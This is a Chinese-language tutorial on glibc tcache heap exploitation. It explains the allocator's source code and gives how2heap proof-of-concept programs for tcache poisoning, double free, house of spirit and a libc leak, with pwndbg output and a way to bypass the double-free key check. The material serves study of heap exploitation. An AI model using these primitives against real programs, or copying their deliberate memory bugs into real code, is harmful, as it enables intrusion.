Tcache Attack


tcache是glibc-2.26之后引进的一种新机制,类似于fastbin,每条单链表上最多7个chunk,释放时只有当tcache满才将释放的块放入fastbin、unsorted bin;同样的,malloc时也会先在tcache中查找合适的块

概述

tcache中新增了两个结构体,即 tcache_entry 和 tcache_perthread_struct

/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  /* Link to the following entry of the same bin; tcache_put stores the
     previous bin head here, so each bin is a singly linked list.  */
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct").  Keeping overall size low is mildly important.  Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  /* counts[i]: number of chunks currently linked into bin i
     (incremented by tcache_put, decremented by tcache_get).  */
  char counts[TCACHE_MAX_BINS];
  /* entries[i]: head of bin i's list; tcache_put pushes at this head
     and tcache_get pops from it.  */
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

/* Thread-local pointer to the current thread's cache; initially NULL.  */
static __thread tcache_perthread_struct *tcache = NULL;

关于tcache有两个重要函数,分别在函数 _int_free 和 __libc_malloc 的开头被调用:

  • tcache_get(),用处是从tcache中获取chunk。函数中只用assert检查了tc_idx的范围以及对应链表非空,取出方式类似于fast bin,但直接执行tcache->entries[tc_idx] = e->next;,不对e->next做任何校验
/* Pop the head entry of tcache bin TC_IDX and return it.
   The only checks are the two asserts below; the value found in the
   popped entry's next field becomes the new bin head unverified.  */
static void *tcache_get (size_t tc_idx)
{
  /* Note: the bin head is read before TC_IDX has been range-checked.  */
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  /* Whatever sits in e->next will be handed out by the next pop.  */
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}
  • tcache_put(),当请求分配的大小不大于0x408且给定大小的tcache bin未满时调用,用处是将chunk放入tcache
/* Push CHUNK onto the front of tcache bin TC_IDX.
   Apart from the index assert nothing is verified here; in particular
   there is no test for CHUNK already being in the bin.  */
static void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  /* The list entry lives in the chunk's user-data area.  */
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  /* LIFO insert: old head becomes our successor, we become the head.  */
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

一个tcache bin中的最大块数mp_.tcache_count为7

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

使用

  • 内存释放

在free函数最先处理部分,首先检查释放块的指针是否对齐、size是否合法,然后优先放入tcache结构中(此时还没有检查前后堆块的状态)

/* Excerpt of _int_free: basic sanity checks on the chunk being freed,
   followed by the tcache fast path.  The excerpt appears abridged --
   several of the declared locals are not used in the part shown.  */
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wraps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

  check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    /* Map the chunk size to its tcache bin index.  */
    size_t tc_idx = csize2tidx (size);

    /* Fast path: when a cache exists, the index is a valid bin and the
       bin holds fewer than mp_.tcache_count chunks, push the chunk and
       return right away.  */
    if (tcache
      && tc_idx < mp_.tcache_bins
      && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif
}
  • 内存申请

内存分配时,malloc函数中有多处会将内存块放入tcache中。

  1. 申请的内存块符合fast bin大小并且在fast bin中找到可用的空闲块时,将该fast bin 链上的其他内存块放入tcache中
  2. 申请的内存块符合small bin大小并且在small bin中找到可用的空闲块时,将该small bin链上的其他内存块放入tcache中
  3. unsorted bin链上循环处理时,找到合适大小的链时,不直接返回,会先放到tcache中,继续处理
  • 获得内存:在内存申请的开始部分,首先判断申请大小的块在tcache中是否存在,如果存在就直接从tcache中取出,否则使用_int_malloc分配
  • 循环处理 unsorted bin时,如果已处理的unsorted bin块数量超过上限(mp_.tcache_unsorted_limit),会立即从tcache中取出一个块返回;该上限默认是0,即不存在上限

    #if USE_TCACHE
        /* If we've processed as many chunks as we're allowed while
     filling the cache, return one of the cached ones.  */
        ++tcache_unsorted_count;
        if (return_cached
          && mp_.tcache_unsorted_limit > 0
          && tcache_unsorted_count > mp_.tcache_unsorted_limit)
        {
          return tcache_get (tc_idx);
        }
      #endif
    
  • 在循环处理 unsorted bin内存块之后,如果放入过tcache块,则会取出一个并返回

      #if USE_TCACHE
          /* If all the small chunks we found ended up cached, return one now.  */
          if (return_cached)
          {
              return tcache_get (tc_idx);
          }
      #endif
    

利用

tcache poisoning

通过覆盖tcache中的next,不需要伪造任何chunk结构即可实现malloc到任何地址

how2heap源码:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Demonstrates tcache poisoning: after a chunk has been freed into the
   tcache, its first word (the next pointer) is overwritten so that the
   second following malloc() of the same size returns an address of our
   choosing (here: a stack variable).  The write through the freed
   pointer is deliberate -- it is the bug being demonstrated.  */
int main()
{
    fprintf(stderr, "This file demonstrates a simple tcache poisoning attack by     tricking malloc into\n"
           "returning a pointer to an arbitrary location (in this case, the stack).\n"
           "The attack is very similar to fastbin corruption attack.\n\n");

    /* Target location that malloc() should eventually hand out.  */
    size_t stack_var;
    fprintf(stderr, "The address we want malloc() to return is %p.\n", (void *)&stack_var);

    fprintf(stderr, "Allocating 1 buffer.\n");
    intptr_t *a = malloc(128);
    fprintf(stderr, "malloc(128): %p\n", (void *)a);
    fprintf(stderr, "Freeing the buffer...\n");
    free(a);

    fprintf(stderr, "Now the tcache list has [ %p ].\n", (void *)a);
    /* sizeof yields size_t, so it is printed with %zu; every %p
       argument is passed as void *.  */
    fprintf(stderr, "We overwrite the first %zu bytes (fd/next pointer) of the  data at %p\n"
        "to point to the location to control (%p).\n", sizeof(intptr_t), (void *)a, (void *)&stack_var);
    /* Intentional use-after-free: corrupt the freed chunk's next pointer.  */
    a[0] = (intptr_t)&stack_var;

    /* First allocation returns the original chunk and makes the forged
       next pointer the new head of the bin.  */
    fprintf(stderr, "1st malloc(128): %p\n", malloc(128));
    fprintf(stderr, "Now the tcache list has [ %p ].\n", (void *)&stack_var);

    /* Second allocation returns the forged address.  */
    intptr_t *b = malloc(128);
    fprintf(stderr, "2nd malloc(128): %p\n", (void *)b);
    fprintf(stderr, "We got the control\n");

    return 0;
}

释放a后:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x6022e0 (size : 0x20d20)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x90)   tcache_entry[7](1): 0x602260

改写next(fd):

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x6022e0 (size : 0x20d20)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x90)   tcache_entry[7](1): 0x602260 --> 0x7fffffffdc80 --> 0x400870 --> 0x41ff894156415741 (invaild memory)
pwndbg> p *(struct tcache_perthread_struct*) 0x602000
$1 = {
  counts = "\000\000\000\000\000\000\000\000Q\002", '\000' <repeats 13 times>, "\001", '\000' <repeats 39 times>,
  entries = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602260, 0x0 <repeats 54 times>}
}

第八个tcache链的next已经被修改成栈上的地址了,接下来通过两次malloc就得到了栈上的chunk

第一次malloc:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x6022e0 (size : 0x20d20)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x90)   tcache_entry[7](0): 0x7fffffffdc80 --> 0x400870 --> 0x41ff894156415741 (invaild memory)

可以看到我们再一次malloc时就会得到一个栈上的chunk

tcache poisoning 这种方法和 fastbin attack 类似,但因为没有 size 的限制有了更大的利用范围

tcache dup

此方法利用的是 tcache_put()函数

/* Push CHUNK onto the front of tcache bin TC_IDX.
   Only the bin index is asserted; there is no check that CHUNK is not
   already on the list, so pushing the same chunk twice links it to
   itself.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  /* LIFO insert: old head becomes our successor, we become the head.  */
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

tcache_put中没什么检查,所以可以对同一个chunk多次释放

how2heap源码:

#include <stdio.h>
#include <stdlib.h>

/* Demonstrates a tcache double free: the same pointer is freed twice in
   a row and the two following allocations of that size are printed.
   The double free is deliberate -- it is the bug being demonstrated.  */
int main()
{
  fprintf(stderr, "This file demonstrates a simple double-free attack with tcache.\n");

  fprintf(stderr, "Allocating buffer.\n");
  int *a = malloc(8);

  fprintf(stderr, "malloc(8): %p\n", a);
  fprintf(stderr, "Freeing twice...\n");
  /* Intentional: free the same chunk twice without an allocation in between.  */
  free(a);
  free(a);

  fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a);
  /* Two allocations of the same size, expected to yield the same address.  */
  fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8) , malloc(8));

  return 0;
}

第一次释放:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602270 (size : 0x20d90)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x20)   tcache_entry[0](1): 0x602260

tcache的第一条链放入了一个chunk

第二次释放时:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602270 (size : 0x20d90)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x20)   tcache_entry[0](2): 0x602260 --> 0x602260 (overlap chunk with 0x602250(freed) )

因为tcache_put()未做任何检查,所以程序不会崩溃,而且在tcache第一条链中放入了两个相同的chunk

tcache perthread corruption

tcache_perthread_struct是整个tcache的管理结构,如果可以控制这个结构,那么无论malloc的size是多少,都可以得到一个地址可控的chunk

假设有如下堆排布情况:

tcache_    +------------+
\perthread |......      |
\_struct   +------------+
           |counts[i]   |
           +------------+
           |......      |          +----------+
           +------------+          |header    |
           |entries[i]  |--------->+----------+
           +------------+          |NULL      |
           |......      |          +----------+
           |            |          |          |
           +------------+          +----------+

通过如 tcache poisoning 等手段之后,将其改成:

tcache_    +------------+<---------------------------+
\perthread |......      |                            |
\_struct   +------------+                            |
           |counts[i]   |                            |
           +------------+                            |
           |......      |          +----------+      |
           +------------+          |header    |      |
           |entries[i]  |--------->+----------+      |
           +------------+          |target    |------+
           |......      |          +----------+
           |            |          |          |
           +------------+          +----------+

就可以通过两次malloc得到 tcache_perthread_struct的地址,进而控制整个tcache

因为tcache_perthread_struct也在堆上,所以一般只需要 partial overwrite就可以达到目的

tcache house of spirit

how2heap源码:

#include <stdio.h>
#include <stdlib.h>

/* Demonstrates the tcache variant of house of spirit: a fake chunk is
   laid out in a stack array, a pointer into it is passed to free(), and
   a following malloc() of the matching size is printed.  Freeing a
   non-heap pointer is deliberate -- it is the bug being demonstrated.  */
int main()
{
  fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
  fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
  fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
  fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

  fprintf(stderr, "Ok. Let's start with the example!.\n\n");


  fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
  /* Result is intentionally discarded; the call is only made for its setup effect.  */
  malloc(1);

  fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
  unsigned long long *a; // pointer that will be overwritten
  unsigned long long fake_chunks[10]; // fake chunk region (lives on the stack)

  fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

  fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
  fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
  fake_chunks[1] = 0x40; // forged size field of the fake chunk


  fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
  fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

  /* User-data pointer of the fake chunk: the element right after the forged size field.  */
  a = &fake_chunks[2];

  fprintf(stderr, "Freeing the overwritten pointer.\n");
  /* Intentional: free() is given a pointer into the stack array.  */
  free(a);

  fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
  fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

攻击的目的就是控制栈上的内容:先malloc一次完成堆的初始化,然后把指向栈上fake chunk的指针传给free,这样就会在tcache的一个链里面插入栈上的fake chunk,之后再malloc相同大小的块就能得到这块栈上的内存

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x603270 (size : 0x20d90)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x40)   tcache_entry[2](1): 0x7fffffffdc50

在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。

libc leak

在之前的版本中,leak libc:

#include <stdlib.h>
#include <stdio.h>

/* Pre-tcache libc leak demo: free a large chunk and print the first
   word left behind in its user data.  Reading through the freed
   pointer is deliberate -- it is the leak being demonstrated.  */
int main()
{
    long *a = malloc(0x1000);
    /* Second allocation placed after the first one; its result is intentionally unused.  */
    malloc(0x10);
    free(a);
    /* %p requires a void * argument; a[0] is a long, so convert it explicitly.  */
    printf("%p\n", (void *)a[0]);
}

而在2.26之后,首先需要将tcache填满

#include <stdlib.h>
#include <stdio.h>

/* libc leak demo for tcache-enabled glibc: seven chunks of the target
   size are freed first so that the later free(a) can no longer go to
   the tcache bin, then the first word left in a's user data is printed.
   Reading through the freed pointer is deliberate -- it is the leak
   being demonstrated.  */
int main(int argc , char* argv[])
{
    long* t[7];
    long *a=malloc(0x100);
    long *b=malloc(0x10);

    // make tcache bin full
    for(int i=0;i<7;i++)
        t[i]=malloc(0x100);
    for(int i=0;i<7;i++)
        free(t[i]);

    free(a);
    // a is put in an unsorted bin because the tcache bin of this size is full
    // %p requires a void * argument; a[0] is a long, so convert it explicitly
    printf("%p\n",(void *)a[0]);
}

free(a)前:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602af0 (size : 0x20510)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x0
(0x110)   tcache_entry[15](7): 0x6029f0 --> 0x6028e0 --> 0x6027d0 --> 0x6026c0 --> 0x6025b0 --> 0x6024a0 --> 0x602390

free(a)之后:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x602af0 (size : 0x20510)
       last_remainder: 0x0 (size : 0x0)
            unsortbin: 0x602250 (size : 0x110)
(0x110)   tcache_entry[15](7): 0x6029f0 --> 0x6028e0 --> 0x6027d0 --> 0x6026c0 --> 0x6025b0 --> 0x6024a0 --> 0x602390
pwndbg> parseheap
addr                prev                size                 status              fd                bk
0x602000            0x0                 0x250                Used                None              None
0x602250            0x0                 0x110                Freed     0x7ffff7dd3c80    0x7ffff7dd3c80 <---main_arena+96
0x602360            0x110               0x20                 Used                None              None

Tcache Check

新版本的libc中添加了对 tcache的double free的check,其中key用于检测double free,让e->key == tcache不成立,就能够绕过检测进行double free(next位于chunk的fd,key则位于bk)

index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
 typedef struct tcache_entry
 {
   struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
 } tcache_entry;

 /* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
 {
   tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
   assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
   e->next = tcache->entries[tc_idx];
   tcache->entries[tc_idx] = e;
   ++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
   assert (tcache->entries[tc_idx] > 0);
   tcache->entries[tc_idx] = e->next;
   --(tcache->counts[tc_idx]);
+  e->key = NULL;
   return (void *) e;
 }

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
   {
     size_t tc_idx = csize2tidx (size);

+    /* Check to see if it's already in the tcache.  */
+    tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+    /* This test succeeds on double free.  However, we don't 100%
+       trust it (it also matches random payload data at a 1 in
+       2^<size_t> chance), so verify it's not an unlikely coincidence
+       before aborting.  */
+    if (__glibc_unlikely (e->key == tcache && tcache))
+      {
+       tcache_entry *tmp;
+       LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+       for (tmp = tcache->entries[tc_idx];
+            tmp;
+            tmp = tmp->next)
+         if (tmp == e)
+           malloc_printerr ("free(): double free detected in tcache 2");
+       /* If we get here, it was a coincidence.  We've wasted a few
+          cycles, but don't abort.  */
+      }
+
     if (tcache
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)